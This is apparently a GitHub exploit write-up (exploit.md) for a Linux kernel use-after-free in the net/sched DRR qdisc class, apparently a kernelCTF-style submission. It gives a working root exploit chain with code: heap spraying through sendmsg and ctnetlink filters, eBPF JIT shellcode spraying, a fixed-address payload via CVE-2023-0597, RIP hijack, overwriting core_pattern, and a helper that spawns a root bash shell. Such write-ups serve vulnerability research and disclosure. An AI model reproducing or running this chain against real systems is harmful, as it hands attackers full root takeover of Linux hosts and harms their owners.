Triggering Vulnerability

Using this vulnerability, we can set reference counter of qdisc class to 0, and then free qdisc class (by deleting the class) while it still attached to the active filter. When packet sent to the network, it will enqueue to the network scheduler. If the packet match to our filter, then it will return our freed qdisc class. Qdisc class object contain qdisc object which used to enqueue packets to the respective network interface via function pointer.

Snippet code if we use drr_class as target object as target object.

static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
		       struct sk_buff **to_free)
{
	unsigned int len = qdisc_pkt_len(skb);
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	int err = 0;
	bool first;

	cl = drr_classify(skb, sch, &err); // [1]
	...
	err = qdisc_enqueue(skb, cl->qdisc, to_free);
	...
	return err;
}

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
				struct sk_buff **to_free)
{
	qdisc_calculate_pkt_len(skb, sch);
	return sch->enqueue(skb, sch, to_free); // [2]
}

In [1], drr_classify will return freed drr_class, then this freed object is used to get the qdisc object via cl->qdisc and passed to qdisc_enqueue function. If we can control cl->qdisc->enqueue we can get RIP control at [2].

Target objects

Our target objects is struct drr_class that resides inside kmalloc-128.

Spray objects

For LTS/COS instance

Since there is no CONFIG_KMALLOC_SPLIT_VARSIZE, we can reallocated struct drr_class with ctl_buf. We use sendmsg to spray ctl_buf with controlled data in line [3].

static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
			   unsigned int flags, struct used_address *used_address,
			   unsigned int allowed_msghdr_flags)
...
		BUILD_BUG_ON(sizeof(struct cmsghdr) !=
			     CMSG_ALIGN(sizeof(struct cmsghdr)));
		if (ctl_len > sizeof(ctl)) {
			ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
			if (ctl_buf == NULL)
				goto out;
		}
		err = -EFAULT;
		if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3]
			goto out_freectl;

For Mitigation instance

Because CONFIG_KMALLOC_SPLIT_VARSIZE is enable, we need to find a struct we can spray in kmalloc-128 fixed cache. We found out struct ctnetlink_filter is in the right cache. We can spray it and put payload.

static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
	struct ctnetlink_filter *filter;
	int err;
...

	filter = kzalloc(sizeof(*filter), GFP_KERNEL);
...
	err = ctnetlink_filter_parse_mark(&filter->mark, cda);
	if (err)
		goto err_filter;

	err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
	if (err < 0)

This technique allows 8-byte overwrite at offset 0x60 but requires CONFIG_NF_CONNTRACK_MARK (+ CONFIG_NETFILTER_ADVANCED + CONFIG_NETFILTER) enabled.

KASLR Bypass

Spray eBPF programs

Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode.

Linux kernel provide a socket option SO_ATTACH_FILTER and let user to attach a classic BPF program to the socket for use as a filter of incoming packets.

By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel.

    struct sock_fprog prog = {
        .len =  TSIZE,
        .filter = filter,
    };
    for(int i=0;i<NUM;i++){
        int fd[2];
        SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
        SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog)));
    }

As for the shellcode in our eBPF program, our goal is to overwrite /proc/sys/kernel/core_pattern so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal:

Use the rdmsr instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( 0xc0000082 ), we'll be able to obtain the address of entry_SYSCALL_64.
Calculate the address of core_pattern and _copy_from_user.
Call _copy_from_user(core_pattern, user_buf, 0x30);, where user_buf is a buffer in user space that stores the content we want to overwrite in core_pattern.

We construct our eBPF program with the following form:

struct sock_filter table[] = {
        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
        .....................
};

The above example will be compiled into the following instructions after JIT:

b8 90 90 90 b3    mov eax, 0xb3909090
b8 90 90 90 b3    mov eax, 0xb3909090

If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become:

90       nop 
b3 b8    mov    bl, 0xb8
90       nop
90       nop
90       nop
b3 b8    mov    bl, 0xb8
....

We can see that by using an extra byte 0xb3, we can skip the useless byte 0xb8 and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction.

Put payload in fixed kernel address (CVE-2023-0597)

Linux kernel maps cpu_entry_area into a fixed kernel address in x86 and that region is also used as exception stack. We can put our payload in the registers and trigger exception from user space. The exception handler will push our registers in the exception stack, allowing us to control data in fixed kernel address.

Catch the signals and skip the offending instruction.

    signal(SIGFPE, handle);
    signal(SIGTRAP, handle);
    signal(SIGSEGV, handle);
    setsid();
    foo(payload);

Put our payload on registers in specific order

foo:
	mov rsp,rdi
	pop r15
	pop r14
	pop r13
	pop r12
	pop rbp
	pop rbx
	pop r11
	pop r10
	pop r9
	pop r8
	pop rax
	pop rcx
	pop rdx
	pop rsi
	pop rdi
	div qword [0x1234000] ; trigger div 0 exception

As a result, we can control about 0x80 bytes in fixed kernel address.

RIP Control

We set cl->qdisc to fixed kernel address that contain our controlled value, and then set enqueue function pointer to guessed ebpf JIT address.

Post RIP

Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to |/proc/%P/fd/666:

We then use memfd and write an executable file payload in fd 666.

int check_core()
{
    // Check if /proc/sys/kernel/core_pattern has been overwritten
    char buf[0x100] = {};
    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    read(core, buf, sizeof(buf));
    close(core);
    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
    int memfd = memfd_create("", 0);
    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
    dup2(memfd, 666);
    close(memfd);
    while (check_core() == 0)
        sleep(1);
    *(size_t *)0 = 0;
}

Later when coredump happened, it will execute our executable file as root in root namespace:

*(size_t*)0=0; //trigger coredump

Executable file root is used to spawn shell when coredump happened. This is the code looks like:

void* job(void* x){
	FILE* fp = popen("pidof billy","r");
	fread(buf,1,0x100,fp);
	fclose(fp);
	int pid = strtoull(buf,0,10);
	int pfd = syscall(SYS_pidfd_open,pid,0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd,0);
	dup2(stdoutfd,1);
	dup2(stderrfd,2);
	execlp("bash","bash",NULL);

}
int main(int argc,char** argv){	
	job(0);
}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

exploit.md

exploit.md

Triggering Vulnerability

Target objects

Spray objects

For LTS/COS instance

For Mitigation instance

KASLR Bypass

Spray eBPF programs

Put payload in fixed kernel address (CVE-2023-0597)

RIP Control

Post RIP

Files

exploit.md

Latest commit

History

exploit.md

File metadata and controls

Triggering Vulnerability

Target objects

Spray objects

For LTS/COS instance

For Mitigation instance

KASLR Bypass

Spray eBPF programs

Put payload in fixed kernel address (CVE-2023-0597)

RIP Control

Post RIP